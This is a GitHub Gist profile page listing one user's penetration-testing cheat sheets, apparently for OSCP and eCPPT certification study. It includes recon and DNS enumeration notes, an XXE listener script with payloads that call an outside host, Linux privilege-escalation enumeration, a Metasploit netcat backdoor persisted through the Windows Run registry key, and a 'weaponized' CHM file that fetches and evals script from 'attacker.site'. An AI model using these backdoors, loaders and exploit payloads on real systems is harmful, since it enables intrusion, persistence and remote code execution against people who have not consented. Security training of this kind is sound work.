Skip to content

Instantly share code, notes, and snippets.

View JPMonglis's full-sized avatar

JPMonglis

10 followers · 25 following
  • 127.0.0.1
View GitHub Profile
@JPMonglis
JPMonglis / pwk_cmnds.txt
Last active March 5, 2019 12:02
OSCP Handy Commands
Nmap Full Web Vulnerable Scan:
mkdir /usr/share/nmap/scripts/vulscan
cd /usr/share/nmap/scrripts/vulscan
wget http://www.computec.ch/projekte/vulscan/download/nmap_nse_vulscan-2.0.tar.gz && tar xzf nmap_nse_vulscan-2.0.tar.gz
@JPMonglis
JPMonglis / msf_wiki.txt
Created September 6, 2018 19:38
## msf netcat backdoor in persistance
- netcat is uncluded in metasploit
-
- upload /usr/share/windwos-binaries/nc.exe C:\\windows\\system32 ## must have system rights
-
-
- ## registry key adding
- echo reg enumkey -k HKLM\\Software\\microsoft\\windows\\currentversion\\run
- echo reg setval -k HKLM\\Software\\microsoft\\windows\\currentversion\\run -v nc -d 'C:\windows\system32\nc.exe -Ldp 443 -e cmd.exe'
- echo reg queryval -k HKLM\\Software\\microsoft\\windows\\currentversion\\run -v nc
@JPMonglis
JPMonglis / ecppt_net.txt
Created September 6, 2018 19:39
eCPPT NETWORK SECURITY
*DNS Enumeration
nslookup example.com
nslookup -query=mx domain
nslookup -query=ns domain
nslookup -query=any domain
interactime mode {
@JPMonglis
JPMonglis / pwk_how-to.txt
Created September 6, 2018 19:40
How to pass the OSCP
Recon
Find vuln
Exploit
Document it
Recon
Unicornscans in cli, nmap in msfconsole to help store loot in database.
TCP
unicornscan -i tap0 -I -mT $IP:a
@JPMonglis
JPMonglis / ptes.txt
Created September 6, 2018 19:40
Penetrating Testing/Assessment Workflow & other fun infosec stuff
https://github.com/jivoi/pentest
My feeble attempt to organize (in a somewhat logical fashion) the vast amount of information, tools, resources, tip and tricks surrounding penetration testing, vulnerability assessment, and information security as a whole*
Reconnaissance
Passive/Semi-Passive
Tools
Discover - https://github.com/leebaird/discover
@JPMonglis
JPMonglis / Dockerfile
Created November 9, 2018 20:39
FROM ubuntu:16.04
RUN apt update ; \
apt install -y git apache2
RUN mkdir /srv/git
COPY git-http.conf .
RUN cat git-http.conf >> /etc/apache2/apache2.conf
@JPMonglis
JPMonglis / Sxx3.py
Created November 9, 2018 20:45
#!/usr/env/python
from __future__ import print_function
import socket
s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.bind(('0.0.0.0',2121))
s.listen(1)
print('XXE-FTP listening ')
conn,addr = s.accept()
print('Connected by %s',addr)
@JPMonglis
JPMonglis / Sxx3-payloads
Created November 9, 2018 20:47
--------------------------------------------------------------
Vanilla, used to verify outbound xxe or blind xxe
--------------------------------------------------------------
<?xml version="1.0" ?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt">
]>
<r>&sp;</r>
@JPMonglis
JPMonglis / linpriv.cheat
Created February 27, 2019 18:47
// Determine linux distribution and version
cat /etc/issue
cat /etc/*-release
cat /etc/lsb-release
cat /etc/redhat-release
// Determine kernel version - 32 or 64-bit?
cat /proc/version
uname -a
uname -mrs
@JPMonglis
JPMonglis / wcf.txt
Created March 11, 2019 21:19
weaponize a CHM file
<!DOCTYPE html><html><head><title>Click Me</title><head></head><body>
This is a demo ! <br>
<OBJECT id=x classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" width=1 height=1>
<PARAM name="Command" value="ShortCut">
<PARAM name="Button" value="Bitmap::shortcut">
<PARAM name="Item1" value=',rundll32.exe,javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WinHttp.WinHttpRequest.5.1");h.Open("GET","http://attacker.site/connect",false);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new%20ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im rundll32.exe",0,true);}'>
<PARAM name="Item2" value="273,1,1">
</OBJECT>
<SCRIPT>
x.Click();